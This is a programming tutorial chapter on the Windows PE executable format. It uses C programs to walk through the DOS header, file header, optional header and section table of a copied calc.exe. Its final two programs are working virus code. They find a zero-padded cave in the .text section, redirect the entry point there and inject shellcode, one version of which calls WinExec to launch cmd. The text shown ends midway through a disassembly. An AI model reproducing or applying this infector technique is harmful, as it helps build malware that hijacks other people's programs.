Windows PE File Format
Early viruses were memory-resident programs that came into being due to loopholes in DOS. They were known as TSR (Terminate and Stay Resident) programs and were mostly coded in the C programming language or in assembler. These viruses were normally found in the boot record or the partition table, or attached themselves to COM files. Then came a new genre of file viruses, which were mostly seen in executable (.exe) files. Today the range is far wider. An executable file need not always end with the extension exe; it can very well be a pif (program information file) too. Besides, viruses are commonly seen in the form of Word macros in doc files. Whatever the file type, injecting code into a file requires one to be well conversant with its internal structure.
This chapter explains how an executable file can be infected, which calls for a complete cross-section of an exe file.
Prior to the Windows operating system there was only DOS, which had its own executable file format. The designers of Windows created their own executable file format called the PE or Portable Executable file format, which is totally different from that of DOS. Windows is capable of understanding the DOS exe file format, but the reverse would need a miracle. Thus if the average Joe executes a DOS exe file under Windows, the operating system handles it; but if the reverse happened, i.e. a Windows exe file were run under DOS, DOS would refuse to recognize the file as an exe file and emit the cryptic error 'Bad command or file name'.
This would lead to great confusion for the average user. To straighten things out, all Windows executables start with a valid DOS header. As a result, if a Windows executable is given to DOS, it displays a polite message such as 'This program must be run under Windows'.
The programs given below display the internal structure of a Windows executable in a 'one step at a time' approach.
a.cpp
#include <windows.h>
#include <stdio.h>
HANDLE hfile, hfile1;
unsigned char *mappedfile;
int main()
{
    /* open the existing file for reading and writing */
    hfile = CreateFile("test.exe", GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    /* create a mapping object that covers the whole file */
    hfile1 = CreateFileMapping(hfile, 0, PAGE_READWRITE, 0, 0, 0);
    /* map the whole file into our address space */
    mappedfile = (unsigned char *)MapViewOfFile(hfile1, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    printf("hfile=%p hfile1=%p mappedfile=%p\n", hfile, hfile1, mappedfile);
    return 0;
}
>copy c:\winnt\system32\calc.exe test.exe
Output
hfile=00000030 hfile1=0000002C mappedfile=00310000
As our code follows the rules of C++, the header files windows.h and stdio.h are required to bring in the function prototypes. Header files also supply the macros and structure tags used in the program.
In order to inject code into an exe file, here test.exe, the file needs to be opened. Therefore, the CreateFile function is called with the filename as its first parameter. The file test.exe is a copy of the calculator program calc.exe.
This function takes seven parameters, of which only three matter to us. The first is the name of the file; the second is the mode the file is to be opened in, in our case read and write; and the fifth, OPEN_EXISTING, specifies that the file is opened only if it already exists on disk and is never created. CreateFile opens the file for reading and writing as per our program and returns a HANDLE to this file.
A HANDLE is basically a typedef for void *. It is the technique Windows uses to convey that the value held in hfile is opaque: the variable cannot be used in any way other than as a function parameter, so displaying its value serves no real purpose.
The file test.exe could be loaded into memory by reading it into an array. That is not a difficult job, but any changes would then be made in memory and not on disk, so the 'saving to disk' task would have to be done manually. Instead, the two functions CreateFileMapping and MapViewOfFile map the file into memory, so that changes made in memory reach the file on disk.
The first function, CreateFileMapping, takes the file handle and a protection parameter; PAGE_READWRITE gives read and write permission on the mapping. The MapViewOfFile function specifies the access rights for the view, and the value it returns is a void *, hence the cast. Casting is a necessary evil while coding in C++.
The value of mappedfile, shown as 310000, is the address where the contents of the file test.exe are mapped, and our next program simply verifies this.
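For comparison, the array approach mentioned above can be sketched in portable C. This is only an illustration: the helper name read_whole_file is our own and not part of any Windows API, and because it merely reads the file, anything changed in the returned buffer stays in memory.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper: read an entire file into a heap buffer.
   Returns NULL on failure; on success *size receives the byte count
   and the caller must free() the buffer. */
unsigned char *read_whole_file(const char *path, size_t *size)
{
    FILE *fp = fopen(path, "rb");
    unsigned char *buf = NULL;
    long len;

    if (fp == NULL)
        return NULL;
    if (fseek(fp, 0, SEEK_END) == 0 && (len = ftell(fp)) >= 0 &&
        fseek(fp, 0, SEEK_SET) == 0) {
        /* allocate at least one byte so an empty file still succeeds */
        buf = (unsigned char *)malloc(len > 0 ? (size_t)len : 1);
        if (buf != NULL && fread(buf, 1, (size_t)len, fp) != (size_t)len) {
            free(buf);
            buf = NULL;
        }
        if (buf != NULL)
            *size = (size_t)len;
    }
    fclose(fp);
    return buf;
}
```

A file mapping avoids both the copy and the manual write-back, which is why the chapter's programs use it.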
a.c
#include <windows.h>
#include <stdio.h>
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
void main()
{
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
printf("%c%c\n",*pmappedfile,*(pmappedfile+1));
*pmappedfile = 65;
}
Output
MZ
This program displays the first two bytes of an exe file under Windows. These happen to be the ASCII values of M and Z. Every DOS exe file begins with the signature MZ. As every Windows executable also starts with a DOS header, the same signature is visible there too, and the output simply proves this point. Next, the first byte is changed from M to A, i.e. 65.
When the program exits, the system changes the first byte of test.exe on disk as well. Now try executing test.exe at the command prompt. You will see an error stating that the file is not a valid Windows executable.
Undo the above damage by changing the last line in the program to
*pmappedfile ='M';
and run the program. The file test.exe now executes as before.
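The signature test can also be written as a small check on any byte buffer. The function name has_mz_signature is our own choice for this sketch.

```c
#include <stddef.h>

/* Returns 1 when the buffer starts with the DOS signature 'M','Z'. */
int has_mz_signature(const unsigned char *buf, size_t len)
{
    return len >= 2 && buf[0] == 'M' && buf[1] == 'Z';
}
```

Passing the mapped pointer and the file size to such a check before reading any header field guards against files that are not executables at all.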
a.c
#include <windows.h>
#include <stdio.h>
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
void main()
{
hfile = CreateFile("test.exe",GENERIC_WRITE
| GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
printf("e_lfanew=%d\n",pimagedosheader->e_lfanew);
}
Output
e_lfanew=200
To repeat ourselves, every executable file under Windows starts with a DOS program and the first two bytes have to be MZ. Once the DOS program ends, the Windows header begins. Microsoft did not hard code the size of this DOS program; instead, the last field of the DOS file header, e_lfanew, stores the offset from the start of the file at which the Windows header begins. This value in our case is 200.
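Without windows.h, the same field can be read directly from the raw bytes. The sketch below assumes the standard layout in which e_lfanew is a 32-bit little-endian value at offset 0x3C of the DOS header; the function names are ours.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a 32-bit little-endian value from a byte buffer. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Return e_lfanew (stored at offset 0x3C of the DOS header),
   or 0 when the buffer is too short or lacks the MZ signature. */
uint32_t get_e_lfanew(const unsigned char *file, size_t len)
{
    if (len < 0x40 || file[0] != 'M' || file[1] != 'Z')
        return 0;
    return read_le32(file + 0x3C);
}
```

Reading byte by byte keeps the code independent of the byte order and structure packing of the machine it runs on.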
a.c
#include <windows.h>
#include <stdio.h>
HANDLE hfile, hfile1;
unsigned char *pmappedfile, *dummy;
int main()
{
    hfile = CreateFile("test.exe", GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    hfile1 = CreateFileMapping(hfile, 0, PAGE_READWRITE, 0, 0, 0);
    pmappedfile = (unsigned char *)MapViewOfFile(hfile1, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    IMAGE_DOS_HEADER *pimagedosheader = (IMAGE_DOS_HEADER *)pmappedfile;
    /* the 4-byte PE signature sits at offset e_lfanew */
    dummy = (unsigned char *)(pmappedfile + pimagedosheader->e_lfanew);
    printf("%c%c %d %d\n", *dummy, *(dummy+1), *(dummy+2), *(dummy+3));
    /* the Image File Header follows the signature */
    IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew + 4);
    printf("Machine=%x\n", pimagefileheader->Machine);
    printf("NumberOfSections=%d\n", pimagefileheader->NumberOfSections);
    /* the DWORD members are unsigned long, hence %lu */
    printf("TimeDateStamp=%lu\n", pimagefileheader->TimeDateStamp);
    printf("PointerToSymbolTable=%lu\n", pimagefileheader->PointerToSymbolTable);
    printf("NumberOfSymbols=%lu\n", pimagefileheader->NumberOfSymbols);
    printf("SizeOfOptionalHeader=%d\n", pimagefileheader->SizeOfOptionalHeader);
    printf("Characteristics=%x\n", pimagefileheader->Characteristics);
    return 0;
}
Output
PE 0 0
Machine=14c
NumberOfSections=3
TimeDateStamp=938257211
PointerToSymbolTable=0
NumberOfSymbols=0
SizeOfOptionalHeader=224
Characteristics=30f
In this program, a variable called dummy is created that first points to the location where the file test.exe is loaded in memory. The value stored in e_lfanew, which is 200, is then added to this location. The first four bytes at this position are the signature of the file. The output shows the signature of a PE file, the letters P and E followed by two zero bytes. The Windows header of every valid executable must start with this signature.
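The four-byte comparison can be sketched as a bounds-checked helper. The name has_pe_signature and the parameter pe_offset (the value read from e_lfanew) are our own.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 when the four bytes at offset pe_offset are 'P','E',0,0. */
int has_pe_signature(const unsigned char *file, size_t len, size_t pe_offset)
{
    static const unsigned char sig[4] = { 'P', 'E', 0, 0 };

    /* refuse offsets that would read past the end of the buffer */
    if (pe_offset > len || len - pe_offset < 4)
        return 0;
    return memcmp(file + pe_offset, sig, 4) == 0;
}
```

The length check matters because e_lfanew comes from the file itself and may point anywhere in a damaged or hostile file.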
After this magic number starts a header or structure called the Image File Header, which is defined in the header file winnt.h. The variable pimagefileheader is created to hold the start of this structure and then all the members of the structure are displayed. The first member is called Machine, with a value of 0x14c.
This means that the program is built to run on an Intel 386 or later, i.e. a 386, a 486 or a 586. Each family of microprocessors has its own unique value. For example, a DEC Alpha has a value of 0x184 and the MIPS R4000 0x166. At present, these machines are only seen in museums.
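A lookup of the Machine value might look like the sketch below. It lists only a handful of the constants defined in winnt.h; the x64 value 0x8664 is not mentioned in this chapter and is added purely for illustration.

```c
#include <stdint.h>

/* Map a few Machine values from winnt.h to readable names. */
const char *machine_name(uint16_t machine)
{
    switch (machine) {
    case 0x014c: return "Intel 386 or later";
    case 0x0166: return "MIPS R4000";
    case 0x0184: return "DEC Alpha";
    case 0x8664: return "x64 (AMD64)";
    default:     return "unknown";
    }
}
```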
An exe file has different fragments such as code, data and resources. These different entities cannot be mixed up and placed together. They require their own space for various reasons; for example, code is executable whereas data is not. Thus the different entities are placed in different compartments or sections. The second member of the structure gives a count of the sections in the file. A little later in this chapter, we will display the details of every section. For now, we have three sections.
The next field is the time at which the linker created the file, stored as the number of seconds elapsed since midnight UTC on the 1st of January 1970 (which is 4 PM on the 31st of December 1969 in US Pacific time). The documentation does not say whether the time shown is when the linker started creating the file or when it finished.
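The stamp can be turned into a calendar date with the standard C library. This is a minimal sketch that assumes the value is a plain count of seconds since the 1970 epoch; the function name is ours.

```c
#include <stdint.h>
#include <time.h>

/* Convert a TimeDateStamp value to broken-down UTC time.
   All fields are zero if the conversion fails. */
struct tm pe_timestamp_to_utc(uint32_t stamp)
{
    time_t t = (time_t)stamp;
    struct tm result = { 0 };
    struct tm *utc = gmtime(&t);

    if (utc != NULL)
        result = *utc;
    return result;
}
```

For the value 938257211 shown in the output above, this gives the 25th of September 1999, 11:00:11 UTC.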
The PE file format shares this header with the obj files created by the compiler, and the next two fields deal with symbols, which is what the compiler understands. Just to clarify, every function is a symbol to the compiler. In our exe file both fields are zero.
The second last field holds the size of the next structure, called the Image Optional Header, which is 224. This header follows the Image File Header. The next example displays the members of this gigantic structure.
The last field gives some more information about the exe file as a series of bits. If the first bit is on, the relocation information has been stripped from the file. Similarly, the second bit says whether the file is an executable image rather than an obj file, and so on.
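Individual bits of the Characteristics field can be tested as sketched below. The values are those of winnt.h, where the names carry an IMAGE_ prefix; the shortened macro names and the helper function are our own.

```c
#include <stdint.h>

/* Characteristics bits, values as defined in winnt.h. */
#define FILE_RELOCS_STRIPPED      0x0001
#define FILE_EXECUTABLE_IMAGE     0x0002
#define FILE_LINE_NUMS_STRIPPED   0x0004
#define FILE_LOCAL_SYMS_STRIPPED  0x0008
#define FILE_32BIT_MACHINE        0x0100
#define FILE_DEBUG_STRIPPED       0x0200
#define FILE_DLL                  0x2000

/* Returns 1 when every bit of 'flag' is set in 'characteristics'. */
int has_characteristic(uint16_t characteristics, uint16_t flag)
{
    return (characteristics & flag) == flag;
}
```

The value 30f hex from the output above has the first four bits and the 0x100 and 0x200 bits set, but not the DLL bit.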
a.c
#include <windows.h>
#include <stdio.h>
void main()
{
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
printf("Magic=%x\n",pimageoptionalheader->Magic);
printf("MajorLinkerVersion=%d\n",pimageoptionalheader->MajorLinkerVersion);
printf("MinorLinkerVersion=%d\n",pimageoptionalheader->MinorLinkerVersion);
printf("SizeOfCode=%ld\n",pimageoptionalheader->SizeOfCode);
printf("SizeOfInitializedData=%ld\n",pimageoptionalheader->SizeOfInitializedData);
printf("SizeOfUninitializedData=%ld\n",pimageoptionalheader->SizeOfUninitializedData);
printf("AddressOfEntryPoint=%x\n",pimageoptionalheader->AddressOfEntryPoint);
printf("BaseOfCode=%x\n",pimageoptionalheader->BaseOfCode);
printf("BaseOfData=%x\n",pimageoptionalheader->BaseOfData);
printf("ImageBase=%x\n",pimageoptionalheader->ImageBase);
printf("SectionAlignment=%x\n",pimageoptionalheader->SectionAlignment);
printf("FileAlignment=%x\n",pimageoptionalheader->FileAlignment);
printf("MajorOperatingSystemVersion=%d\n",pimageoptionalheader->MajorOperatingSystemVersion);
printf("MinorOperatingSystemVersion=%d\n",pimageoptionalheader->MinorOperatingSystemVersion);
printf("MajorImageVersion=%d\n",pimageoptionalheader->MajorImageVersion);
printf("MinorImageVersion=%d\n",pimageoptionalheader->MinorImageVersion);
printf("MajorSubsystemVersion=%d\n",pimageoptionalheader->MajorSubsystemVersion);
printf("MinorSubsystemVersion=%d\n",pimageoptionalheader->MinorSubsystemVersion);
printf("Win32VersionValue=%d\n",pimageoptionalheader->Win32VersionValue);
printf("SizeOfImage=%d\n",pimageoptionalheader->SizeOfImage);
printf("SizeOfHeaders=%d\n",pimageoptionalheader->SizeOfHeaders);
printf("CheckSum=%d\n",pimageoptionalheader->CheckSum);
printf("Subsystem=%d\n",pimageoptionalheader->Subsystem);
printf("DllCharacteristics=%x\n",pimageoptionalheader->DllCharacteristics);
printf("SizeOfStackReserve=%x\n",pimageoptionalheader->SizeOfStackReserve);
printf("SizeOfStackCommit=%x\n",pimageoptionalheader->SizeOfStackCommit);
printf("SizeOfHeapReserve=%x\n",pimageoptionalheader->SizeOfHeapReserve);
printf("SizeOfHeapCommit=%x\n",pimageoptionalheader->SizeOfHeapCommit);
printf("LoaderFlags=%d\n",pimageoptionalheader->LoaderFlags);
printf("NumberOfRvaAndSizes=%d\n",pimageoptionalheader->NumberOfRvaAndSizes);
}
Output
Magic=10b
MajorLinkerVersion=5
MinorLinkerVersion=12
SizeOfCode=75264
SizeOfInitializedData=15872
SizeOfUninitializedData=0
AddressOfEntryPoint=134ef
BaseOfCode=1000
BaseOfData=14000
ImageBase=1000000
SectionAlignment=1000
FileAlignment=200
MajorOperatingSystemVersion=5
MinorOperatingSystemVersion=0
MajorImageVersion=5
MinorImageVersion=0
MajorSubsystemVersion=4
MinorSubsystemVersion=0
Win32VersionValue=0
SizeOfImage=102400
SizeOfHeaders=1536
CheckSum=113241
Subsystem=2
DllCharacteristics=8000
SizeOfStackReserve=40000
SizeOfStackCommit=1000
SizeOfHeapReserve=100000
SizeOfHeapCommit=1000
LoaderFlags=0
NumberOfRvaAndSizes=16
This program displays the members of the Image Optional Header, which are the ones used when writing our so-called virus. The header starts right after the Image File Header, so the size of the Image File Header is added to the pointer that points to the start of the Image File Header.
A short description of some of the fields follows.
This header starts with its own magic number, 0x10b. This is followed by the major and minor version numbers of the linker that produced the exe file, in our case 5.12. Then comes the size of the code present in the file in bytes, 75264. The size of initialized data covers variables that have been given an initial value. The size of uninitialized data is the space taken up in memory when the file is loaded, for which no space is reserved in the file on disk. The next field, the entry point, is the most crucial one. It presently has a value of 0x134ef, which is the address of the first instruction that will be executed in memory. This field is defined to be an RVA or relative virtual address.
The program does not tell the operating system directly where it should be loaded in memory. Instead, the loader uses the value stored in the field called ImageBase, which in our case is 0x1000000. Once the file is loaded at this position, the loader jumps to the entry point, 0x134ef bytes from the image base, to execute the first instruction. This instruction is thus stored at 0x1000000 plus 0x134ef, i.e. 0x10134ef. To calculate the actual address we add the ImageBase to the RVA. An RVA is always an offset from the image base.
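The arithmetic is a single addition, sketched here with a function name of our own choosing. It assumes the image really is loaded at the address given in ImageBase.

```c
#include <stdint.h>

/* Convert an RVA to a virtual address for an image loaded at image_base. */
uint32_t rva_to_va(uint32_t image_base, uint32_t rva)
{
    return image_base + rva;
}
```

With the values from the output above, rva_to_va(0x1000000, 0x134ef) gives 0x10134ef.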
The BaseOfCode field holds the RVA at which the code begins in memory, and this value is also given in the section table. The next field, BaseOfData, does the same for the data section and is again available in the section headers.
The section alignment governs where sections start in memory. In Windows, the section alignment is usually 4096 bytes, which means that every section begins in memory at a multiple of 4096. Thus if the code section is 90 bytes long, the data section that follows will begin 4006 bytes after it ends and the memory area in the middle will be left unused. The file alignment is normally the sector size, i.e. 512 bytes.
Each section on disk begins on a new sector, so even when a section is only 5 bytes long the remaining 507 bytes stay allocated to it, though unused. The rest of the fields are of academic interest to us as of now.
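Rounding a size up to an alignment boundary can be sketched as follows. The function name align_up is ours, and the bit trick assumes the alignment is a power of two, which holds for the values 512 and 4096 used here.

```c
#include <stdint.h>

/* Round 'value' up to the next multiple of 'alignment'.
   'alignment' must be a power of two. */
uint32_t align_up(uint32_t value, uint32_t alignment)
{
    return (value + alignment - 1) & ~(alignment - 1);
}
```

So align_up(90, 4096) is 4096 and align_up(5, 512) is 512, matching the two examples in the text.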
a.c
#include <windows.h>
#include <stdio.h>
struct section {
    BYTE Name[8];
    DWORD VirtualSize;
    DWORD VirtualAddress;
    DWORD SizeOfRawData;
    DWORD PointerToRawData;
    char a[16];    /* padding for the remaining fields of the 40-byte header */
};
int main()
{
    struct section *sec;
    HANDLE hfile, hfile1;
    unsigned char *pmappedfile;
    int i;
    hfile = CreateFile("test.exe", GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    hfile1 = CreateFileMapping(hfile, 0, PAGE_READWRITE, 0, 0, 0);
    pmappedfile = (unsigned char *)MapViewOfFile(hfile1, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    IMAGE_DOS_HEADER *pimagedosheader = (IMAGE_DOS_HEADER *)pmappedfile;
    IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew + 4);
    IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader + sizeof(IMAGE_FILE_HEADER));
    /* the section headers follow the optional header */
    sec = (struct section *)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
    printf("Section PointerToRawData SizeOfRawData VirtualAddress VirtualSize\n");
    for (i = 0; i < pimagefileheader->NumberOfSections; i++)
    {
        /* Name is not null terminated when it is exactly 8 bytes long, hence %.8s */
        printf("%.8s %05lx %05lx %05lx %05lx\n", sec[i].Name, sec[i].PointerToRawData, sec[i].SizeOfRawData, sec[i].VirtualAddress, sec[i].VirtualSize);
    }
    return 0;
}
Output
Section PointerToRawData SizeOfRawData VirtualAddress VirtualSize
.text 00600 12600 01000 124ee
.data 12c00 00c00 14000 010c0
.rsrc 13800 02c00 16000 02b98
This program goes further and displays the details of the section headers that immediately follow the Image Optional Header. There is one section header per section and the size of each header is 40 bytes. We create our own structure called section, knowing that there is already one in winnt.h, just to explain things better. Even though we are interested in the first five members only, we still need a structure 40 bytes long as the section headers are stored back to back. This explains the padding of 16 bytes towards the end.
The Image File Header has a member which gives the number of sections present in the executable. Thus, using a for loop, the details of each section can be displayed.
The first member of the header is always the name of the section, which generally starts with a dot and is restricted to 8 bytes. By convention the section that carries code is called .text, the one carrying data .data and the one carrying resources .rsrc. Even though these names are conventional, compiler options let us create our own sections and give them user-defined names that need not start with a dot.
The next member, even though it is called Virtual Size, is the actual size of the section data. Similarly, there is one more field called Size of Raw Data, which for the .text section is the same value rounded up to the file alignment, i.e. 512 bytes: 124ee hex becomes 12600 hex. For the .data section above the Virtual Size is the larger of the two, since part of the section occupies memory without taking up space on disk.
The field PointerToRawData is the position or offset of the section on disk. Its value is a multiple of the file alignment, 512 bytes. The loader uses it to identify where each section starts on disk.
The VirtualAddress field is the RVA at which the section is loaded in memory, where all values are a multiple of 1000 hex. This is where the sections are to be found in memory.
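These four fields are what a parser needs to translate an RVA into a position in the file on disk. The sketch below is our own illustration: the structure section_info holds just those fields, and the lookup only accepts RVAs that are backed by raw data on disk.

```c
#include <stddef.h>
#include <stdint.h>

/* The four section-header fields used here (a subset of the 40-byte header). */
struct section_info {
    uint32_t VirtualSize;
    uint32_t VirtualAddress;
    uint32_t SizeOfRawData;
    uint32_t PointerToRawData;
};

/* Translate an RVA to a file offset using the section table.
   Returns 1 and stores the offset on success, 0 when the RVA
   is not backed by the raw data of any section. */
int rva_to_file_offset(const struct section_info *sections, size_t count,
                       uint32_t rva, uint32_t *offset)
{
    size_t i;

    for (i = 0; i < count; i++) {
        uint32_t start = sections[i].VirtualAddress;

        if (rva >= start && rva - start < sections[i].SizeOfRawData) {
            *offset = rva - start + sections[i].PointerToRawData;
            return 1;
        }
    }
    return 0;
}
```

With the section table shown in the output above, RVA 1000 hex maps to file offset 600 hex, the start of the .text section on disk.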
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
unsigned char vcdcode[]="\xcc";
section *psection;
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
long positionofvcd;
int howmanyzeroes=0,i;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
psection = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
int totalsize =
psection->PointerToRawData + psection->SizeOfRawData;
for(positionofvcd=psection->PointerToRawData;positionofvcd
<= totalsize;positionofvcd++)
{
if(pmappedfile[positionofvcd]==0)
{
howmanyzeroes++;
if(howmanyzeroes==69)
break;
}
else
howmanyzeroes=0;
}
positionofvcd -= 65;
printf("positionofvcd=%x\n",positionofvcd);
pimageoptionalheader->AddressOfEntryPoint
= positionofvcd + psection->VirtualAddress - psection->PointerToRawData;
int sizeofvcd = sizeof(vcdcode);
for(i =0; i<sizeofvcd ;i++)
pmappedfile[positionofvcd+i]=vcdcode[i];
}
Output
positionofvcd=12af3
We have attempted to do something significant in this program. On executing the above program, the program test.exe gets infected, but in a rather unique way. When the executable test.exe is started, it displays a message box stating that a breakpoint has been reached. This implies that instead of the code of the program test.exe being run, the breakpoint instruction 0xcc has been encountered.
Now to the workings.
A variable totalsize is initialized
to denote an offset that points to the end of the section. This offset is
achieved by adding the SizeOfRawData to the PointerToRawData field which points
to the section start.
The next goal is to find the place in
the .text section where there are 69 consecutive zeroes. This position within the .text section is required as we
will be copying our code or vcd (virus code) here thus not overwriting the
actual code. The text section like all other sections will be zero or null
padded till it reaches the section alignment. Thus finding 69 consecutive
zeroes is not too difficult.
In the for loop, the variable
positionofvcd is set to the start of the .text section on disk. Nevertheless,
in an extreme case where we cannot find 69 consecutive zeroes, we would like
the loop to terminate when it reaches the end of the sections.
The file on disk and the bytes in
pmappedfile array is the same, so we check the byte in memory since it is
easier using the array notation. The pmappedfile refers to the start of memory
where the file is loaded and positionofvcd is the offset. When the value at the
offset is zero, the variable howmanyzeroes is incremented by one.
Thus at any point in time variable
howmanyzeroes gives a count on the consecutive zeroes passed over. Also, when a
non zero value is encountered, the else block gets called where the variable is
reset to 0 again. Simultaneously, in the if statement a check is performed
whether the variable howmanyzeroes is 69. If so, the loop is terminated as 69
consecutive zeroes in the file have been found.
The offset variable positionofvcd
however is at the end of the 69 consecutive zeroes. Therefore to reposition it
to the start, the value must be subtracted by 69. We subtract 65 instead just
to keep 4 zeroes. What is 4 zeroes between us. This shows no errors and
everything works as advertised.
The next task is to change the entry
point RVA. Just to refreshen your memory, the entry point points to the first
byte of code that is to be executed and it is an RVA. The value for this field
should now point to the start of 65 consecutive zeroes.
The position of vcd is an offset from
the start of the file and therefore the start of the section stored in the
PointerToRawData member of the section structure is subtract from it. The sec
variable points to the .text section thereby giving an offset from the
beginning of the text section. However our objective is to get the offset from
the image base and therefore the Sections VirtualAddress stored in the section
structure is added to convert it into an RVA. If we execute the program at this
stage, the loader would load test.exe into memory and then executed our code
which simply comprises 65 consecutive zeroes.
So the next job is to add our code
that is to executed. For this purpose, an array of chars called vcdcode is
created which currently holds only one byte, i.e. CC the op code for a breakpoint.
Later the actual code will be inserted in this array. The code bytes of this
array is copied at the memory location of the consecutive zeroes. The variable
positionofvcd has the offset as to where these bytes need to be copied. The
system as always will write these bytes to disk.
In this manner, the first of the
zeroes is replaced with a breakpoint. Now, when we run our program and then run
test, we see the breakpoint interrupt generated. Simply click on ok and proceed
to the next program that does much more.
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
unsigned
char vcdcode[] = "\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";
section *psection;
HMODULE hloadlibrary;
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
long positionofvcd,haddresoffunction;
int howmanyzeroes=0,i;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
psection = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
int totalsize =
psection->PointerToRawData + psection->SizeOfRawData;
for(positionofvcd=psection->PointerToRawData;positionofvcd
<= totalsize;positionofvcd++)
{
if(pmappedfile[positionofvcd]==0)
{
howmanyzeroes++;
if(howmanyzeroes==69)
break;
}
else
howmanyzeroes=0;
}
positionofvcd -= 65;
pimageoptionalheader->AddressOfEntryPoint
= positionofvcd + psection->VirtualAddress - psection->PointerToRawData;
int sizeofvcd = sizeof(vcdcode);
hloadlibrary =
LoadLibrary("kernel32.dll");
haddresoffunction = (unsigned
long)GetProcAddress(hloadlibrary,"WinExec");
for (i = 0; i < 4 ; i++)
vcdcode[sizeofvcd-10+i] =
haddresoffunction >> (i * 8);
for(i =0; i<sizeofvcd ;i++)
pmappedfile[positionofvcd+i]=vcdcode[i];
}
The best way to understand this
program is to run it and see the code being executed in the debugger. Thus at
the breakpoint interrupt click on cancel. The code shown below is displayed in
the debug window and it is similar to what is written in the vcdcode array.
Just to sum up. The entry point RVA
is changed to point to the newly inserted code and then file test.exe is
executed. The breakpoint interrupt gets called. The bytes that we have in the
vcdcode array are disassembled as
Output
CC int
3
55 push
ebp
8B EC mov ebp,esp
51 push
ecx
C7 45 FC 63 6D 64 00 mov dword ptr [ebp-4],646D63h
